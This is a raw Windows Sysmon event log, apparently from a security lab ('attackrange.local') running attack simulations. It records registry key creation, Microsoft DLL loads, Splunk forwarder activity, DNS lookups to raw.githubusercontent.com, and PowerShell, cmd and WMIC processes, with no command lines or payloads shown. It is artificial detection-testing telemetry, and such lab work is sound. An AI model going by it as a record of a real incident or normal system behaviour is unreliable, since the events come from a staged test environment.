12241200x800000000000000057349106Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349105Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349104Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349103Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349102Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349101Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349100Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 734700x800000000000000057349099Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.989{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\AppXDeploymentServer.dll10.0.14393.4530 (rs1_release.210705-0736)AppX Deployment Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationAppXDeploymentServer.dllMD5=33FBA504974FC48036A4A9C5F57821AA,SHA256=9132BB8E3E11F28C95F9C6E3A6155F003B6089A943A62E7085859A9504C21897trueMicrosoft WindowsValid 12241200x800000000000000057349098Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349097Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349096Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349095Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349094Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349093Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349092Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349091Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349090Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349089Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349088Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349087Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349086Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057349085Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.020{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\wer.dll10.0.14393.4402 (rs1_release.210426-1725)Windows Error Reporting DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationwer.dllMD5=65C4FEDB972CDE71C2AF0F5AFA1C1C15,SHA256=63C1A7AC782F15980F47972E5B481C2E80EBCD1A2A497EAE93F469BD266CC638trueMicrosoft WindowsValid 12241200x800000000000000057349084Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057349083Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.020{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057349082Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.020{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\wevtapi.dll10.0.14393.3053 (rs1_release_inmarket.190612-1836)Eventing Consumption and Configuration APIMicrosoft® Windows® Operating SystemMicrosoft Corporationwevtapi.dllMD5=E0D1C6AC18800339A2EC1134A7C899ED,SHA256=E4340ACB47A202B1BFCE678C44BA5B0B171E388021B0B7D0CED19A55AD9712E1trueMicrosoft WindowsValid 734700x800000000000000057349081Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.020{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\ntmarta.dll10.0.14393.0 (rs1_release.160715-1616)Windows NT MARTA providerMicrosoft® Windows® Operating SystemMicrosoft Corporationntmarta.dllMD5=854A3CAE7C97B630158C9F7EE8555970,SHA256=20F0A4D99C5095A0CAC39B816BFC987F64CD051843C79E027714666375986176trueMicrosoft WindowsValid 734700x800000000000000057349080Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.020{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000057349079Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.004{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000057349078Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.989{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=E0F286AF345442E267C33880492CED31,SHA256=5C6D66F5A748551999BE1CDE33A3A1FC2E10D1297EF275D232A9FDCC95BEA84BtrueMicrosoft WindowsValid 734700x800000000000000057349077Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.989{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\fltLib.dll10.0.14393.0 (rs1_release.160715-1616)Filter LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationfilterLib.dllMD5=051ABD8360BDA63A1BC77C662FBF0A25,SHA256=C914E2DBAEC2C9A11923A984B30A979637D3A27B3C29E93F4C90FB1D9FBC518FtrueMicrosoft WindowsValid 734700x800000000000000057349076Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.989{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057349075Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.989{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057349074Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.989{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057349073Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.989{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\StateRepository.Core.dll10.0.14393.4169 (rs1_release.210107-1130)StateRepository CoreMicrosoft® Windows® Operating SystemMicrosoft CorporationStateRepository.Core.dllMD5=94299201E0B602E4692F61C5A46E32D9,SHA256=D343410FB20D88B74BF661CACADBBD913034D02410A826A84D60B2B66A95A862trueMicrosoft WindowsValid 734700x800000000000000057349072Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.989{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 12241200x800000000000000057349071Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.989{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057349070Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.989{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 12241200x800000000000000057349069Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.989{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 23542300x800000000000000021219869Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:52.376{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA57A8450D95EF4873ECF8A9C1F663D8,SHA256=F8D4E8D2E729EA5F1EBE2A2A16415A5DD744F23AA5697709C219D4CF00822C46,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350099Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:53.442{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\System2021-09-16 14:13:20.958 23542300x800000000000000057350098Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:53.442{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=BE7B8FF9F4F452E3E71A5470D7C14890,SHA256=EF248454F69B2E62D7714996E2E498A138252DC81A8ABAC91D1EE343A3105859falsetrue 11241100x800000000000000057350097Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:53.442{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\System2021-09-16 14:13:20.958 23542300x800000000000000057350096Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:53.442{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A0ED433EE0D6AA04C7C2A8404D508224,SHA256=3068ED5A2985962CF87D2E7964191C29E7B075B3A88CCD2BF831066C905667C5falsetrue 23542300x800000000000000057350095Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:53.111{8B6011A9-C6FA-616E-9B35-01000000F101}300ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-err.txtMD5=2906DF6A8548F61214CA35EBF66E4014,SHA256=82D3A4E857A2A213197A47E6F40C5D955DFCD3BE4659F0265B6417DE0EBE5735falsetrue 534500x800000000000000057350094Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:53.074{8B6011A9-5BAC-618E-60F3-04000000F101}360C:\Windows\System32\cmd.exe 534500x800000000000000057350093Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:53.074{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exe 354300x800000000000000057350092Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:23.423{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54569-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219870Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:53.376{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=417C708B8181F0BCB76738F9B57A719B,SHA256=C63155F6E250D2B26B47C80CF672F8B4606490EBCA3D11E598827803DCC01B93,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350103Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:54.310{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057350102Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:54.309{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4733DA4A230288A10DE00949449FF722,SHA256=F22417724E64BFAF097407F8E3FBABF59E4C217B0CB716AA698B347A3E52C57Ffalsetrue 11241100x800000000000000057350101Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:54.308{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350100Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:54.308{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2102E4FE9CCB082584522799DA88C12A,SHA256=A3750F6D811150562762A4930F2280F743B99F1735C965F7D549A365421DD0AFfalsetrue 23542300x800000000000000021219871Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:54.470{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A9A56B467FF00B346C04D0F4BDFB1BC,SHA256=247F8BA42958F86695E0DB854A2456F667FDC478E977654ECFF119BA6E471BBD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350112Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:55.874{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350111Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:55.874{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FFBC176420871A6F535815A6DD290239,SHA256=528CF2EBE36603BD31F5ACADF6E556EFE648846FB585E03356B9C2A1F3BBB603falsetrue 22542200x800000000000000057350110Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:25.236{00000000-0000-0000-0000-000000000000}8044ocsp.digicert.com0type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;<unknown process> 22542200x800000000000000057350109Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:25.175{00000000-0000-0000-0000-000000000000}8044raw.githubusercontent.com0::ffff:185.199.110.133;::ffff:185.199.109.133;::ffff:185.199.111.133;::ffff:185.199.108.133;<unknown process> 354300x800000000000000057350108Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:25.256{00000000-0000-0000-0000-000000000000}8044<unknown process>-tcptruefalse10.0.1.14win-dc-469.attackrange.local54571-false72.21.91.29-80http 13241300x800000000000000057350107Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:55.590{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x800000000000000057350106Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:55.590{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\jva32pnyp.rkrBinary Data 354300x800000000000000057350105Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:25.226{8B6011A9-887D-6164-2D00-00000000F101}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local63274- 354300x800000000000000057350104Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:25.182{00000000-0000-0000-0000-000000000000}8044<unknown process>-tcptruefalse10.0.1.14win-dc-469.attackrange.local54570-false185.199.110.133cdn-185-199-110-133.github.com443https 23542300x800000000000000021219872Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:55.501{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EE80C4C8FE48E57F1EA659273171D42,SHA256=DA0B20457FAC2FA64FA4041B4412805AFA91E2E4A5396744D0DB1BF401828854,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057350114Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:27.179{8B6011A9-887D-6164-2D00-00000000F101}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local53939- 22542200x800000000000000057350113Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:27.206{8B6011A9-887D-6164-2700-00000000F101}2856133.110.199.185.in-addr.arpa.0type: 12 cdn-185-199-110-133.github.com;C:\Windows\sysmon64.exe 23542300x800000000000000021219875Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:56.501{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=913D1091F6C88A34C3865A8FE5B6B659,SHA256=D618F6F8459A4264F1722458EE8D3547F99B88AFC9ADD0AAE73B2568AA3449A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219874Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:56.314{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BB85FD7B5AD337FFA40282CE0480ED08,SHA256=825532643C338CA4CD0463B610A61D55BF15F830E8F264B203C606CBFB9D69A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219873Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:56.314{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6EAAB3C253C70C3724243A2685110B81,SHA256=12CE92A7F245342D428E0542B9FB06807A2B058015F2CD821F7373E4B27E2C13,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057350119Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:28.512{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54572-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057350118Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:57.427{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350117Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:57.427{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C96FDB0DC8C49E88CD8A5EA8CB30386E,SHA256=C6CDBE98D1BAE70EA8F3AD1CABA9E625D6C1EAA97A6C25A872D335113E31C65Afalsetrue 